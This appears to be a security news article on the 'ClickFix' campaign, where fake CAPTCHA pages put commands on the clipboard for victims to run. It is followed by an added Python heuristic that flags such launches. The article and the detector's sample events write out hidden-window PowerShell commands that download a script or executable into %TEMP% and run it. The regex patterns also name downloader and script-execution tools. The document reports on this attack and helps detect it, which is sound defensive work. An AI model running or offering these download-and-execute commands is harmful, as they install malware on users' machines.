Surge in Browser-Based Malware Campaign: ClickFix
In mid-2025, researchers at Lab539 identified a sharp escalation of the browser-based campaign known as “ClickFix.”
Surfacing in July, the campaign quickly expanded to more than 13,000 distinct domains, each built to trick visitors into running attacker-supplied commands on their own machines.
The campaign relies on compromised or low-cost hosting, a substantial share of it fronted by Cloudflare, to deliver payloads through deceptively innocuous web prompts.
Visitors to these sites are shown a CAPTCHA-style challenge and then coaxed into executing a command that the page has already placed on their clipboard, which lets the attacker run arbitrary scripts or executables on the victim’s machine.
At first the growth in ClickFix domains looked insignificant against the wider threat landscape, but by mid-August a sharp increase had caught the attention of numerous threat-intelligence platforms.
Lab539 analysts reported a sudden wave of front-end sites that disguise malware delivery as a “verification” step, a trait that distinguishes ClickFix from traditional phishing and watering-hole attacks.
The scale of the registrations implies an automated provisioning process, most likely driven by pay-as-you-go registrars and resold hosting rather than the hand-built infrastructure typical of advanced persistent threat actors.
Cloudflare fronts roughly 24% of the identified ClickFix domains, but the campaign spans nearly 500 other providers, a deliberate diversification that defeats simple provider-level blocklists.
Regional VPS providers in the United States, Germany, Indonesia, and Brazil feature prominently, pointing to both global reach and opportunistic compromise of third-party servers.
In many cases the attackers repurposed stale or misconfigured subdomains, some belonging to decades-old academic or municipal hosts, so that malicious traffic blends in with legitimate DNS records.
Infection Mechanism and Payload Delivery
The infection mechanism abuses the browser’s clipboard API: the page silently writes a command to the clipboard, and the victim is then instructed to paste it into a terminal and run it.

Once the CAPTCHA is completed, the site writes a PowerShell command sequence to the clipboard. For instance:
cmd /c start /min powershell -Command curl.exe -s https://cf-unstable.mediacaptcha.txt -o $env:TEMP\captcha.vbs; Start-Process $env:TEMP\captcha.vbs
That single line downloads a VBScript payload into %TEMP% and launches it, with start /min hiding the console window and curl.exe -s suppressing progress output; beyond the paste itself no further user interaction is needed, which illustrates the campaign’s reliance on social engineering rather than exploitation. Because Start-Process on a .vbs file hands it to the Windows Script Host (wscript.exe by default), the resulting cmd.exe → powershell.exe → wscript.exe process chain, started from an interactive user session, is a useful detection anchor.
Variants include direct executable downloads and obfuscated scripts, suggesting that multiple operators are using the ClickFix framework.
The prevalence of the method shows how little technical expertise is needed to generate intrusion opportunities at scale once it is combined with automated domain registration and globally distributed hosting.
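As an added example (not code from Lab539 or the article), the following Python scores process-creation command lines for the traits of the clipboard payload quoted above and of the encoded and direct-executable variants: a hidden window, a PowerShell downloader, a drop into %TEMP%, and immediate execution of the dropped file. The indicator weights, the threshold, and the sample events are constructed assumptions for illustration; the first sample reuses the command line printed in the article, the others use TEST-NET addresses.

```python
"""Heuristic triage of process-creation events for ClickFix-style launches.

Added example, not code from Lab539 or the article. Weights, threshold and
sample events are constructed for illustration.
"""
import re
from dataclasses import dataclass

# (name, pattern, weight); patterns run against the lowercased command line.
INDICATORS = [
    ("hidden_window", r"\bstart\s+/min\b|-w(?:indowstyle)?\s+hidden\b", 2),
    ("powershell",    r"\bpowershell(?:\.exe)?\b|\bpwsh\b", 1),
    ("downloader",    r"\bcurl(?:\.exe)?\b|\biwr\b|invoke-webrequest|downloadstring|downloadfile", 2),
    ("remote_url",    r"https?://", 1),
    ("temp_drop",     r"\$env:temp\b|%temp%|\\appdata\\local\\temp\\", 2),
    ("exec_dropped",  r"start-process|\biex\b|invoke-expression|\b[wc]script\b|\bmshta\b", 2),
    ("encoded",       r"-e(?:nc(?:odedcommand)?)?\s+[a-z0-9+/=]{20,}", 3),
]
COMPILED = [(name, re.compile(pat), weight) for name, pat, weight in INDICATORS]
THRESHOLD = 6  # assumption: set so that one or two benign traits never fire alone


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # basename of the created process, e.g. cmd.exe
    parent_image: str   # basename of its parent, e.g. explorer.exe
    command_line: str


def score_command_line(cmd):
    """Return (score, matched indicator names) for one command line."""
    text = cmd.lower()
    hits = [name for name, rx, _ in COMPILED if rx.search(text)]
    score = sum(weight for name, _, weight in COMPILED if name in hits)
    return score, hits


def event_score(event):
    """Command-line score plus one point when the process was launched from an
    interactive shell context (the desktop shell or cmd.exe), which is how a
    pasted ClickFix command begins life; service- or scheduler-spawned shells
    get no bonus."""
    score, hits = score_command_line(event.command_line)
    if event.parent_image.lower() in ("explorer.exe", "cmd.exe"):
        score += 1
        hits = hits + ["interactive_parent"]
    return score, hits


def is_clickfix_like(event, threshold=THRESHOLD):
    return event_score(event)[0] >= threshold


def triage(events, threshold=THRESHOLD):
    """Return [(image, score, hits)] for every event that crosses the threshold."""
    return [(ev.image, *event_score(ev)) for ev in events if is_clickfix_like(ev, threshold)]


# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    # 1. The clipboard payload from the article, as logged for the cmd.exe the user ran.
    ProcessEvent("cmd.exe", "explorer.exe",
                 r"cmd /c start /min powershell -Command curl.exe -s https://cf-unstable.mediacaptcha.txt "
                 r"-o $env:TEMP\captcha.vbs; Start-Process $env:TEMP\captcha.vbs"),
    # 2. Obfuscated variant: hidden window plus an encoded command (base64 blob is a placeholder).
    ProcessEvent("powershell.exe", "explorer.exe",
                 "powershell.exe -w hidden -NoP -ep bypass -enc "
                 "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA"),
    # 3. Benign: an admin listing the temp directory.
    ProcessEvent("powershell.exe", "explorer.exe",
                 r"powershell.exe -Command Get-ChildItem $env:TEMP"),
    # 4. Benign: a scripted health check with curl from a batch file.
    ProcessEvent("curl.exe", "cmd.exe",
                 r"curl.exe -s https://203.0.113.5/health -o C:\logs\health.json"),
    # 5. Direct-executable variant of the same pattern.
    ProcessEvent("cmd.exe", "explorer.exe",
                 r"cmd /c start /min powershell -c iwr https://203.0.113.5/upd.exe "
                 r"-OutFile $env:TEMP\upd.exe; Start-Process $env:TEMP\upd.exe"),
]


if __name__ == "__main__":
    for image, score, hits in triage(SAMPLE_EVENTS):
        print(f"{image:16} score={score:2}  {', '.join(hits)}")
```

Run against the constructed samples, the detector flags events 1, 2 and 5 and leaves the two benign administrative commands below the threshold. In practice the scoring applies equally to command lines recovered from shell history, so it can be used for retrospective hunting as well as real-time alerting.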
Source link: Cybersecuritynews.com.